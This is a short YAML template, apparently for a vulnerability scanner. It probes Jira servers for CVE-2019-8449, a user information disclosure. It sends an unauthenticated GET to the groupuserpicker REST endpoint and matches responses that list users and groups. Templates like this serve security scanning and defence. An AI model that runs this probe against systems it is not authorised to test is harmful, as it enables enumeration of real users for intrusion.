id: jira-user-disclosure
info:
  name: Jira User Information Disclosure (CVE-2019-8449)
  risk: Low

params:
  - root: "{{.BaseURL}}"

replicate:
  ports: '8080'
  prefixes: 'jira, wiki, confluence'


requests:
  - method: GET
    redirect: false
    url: >-
     {{.root}}/rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", "total") && StringSearch('body', 'groups') && StringSearch('body', 'users') && StringSearch("resHeaders", "X-AREQUESTID")

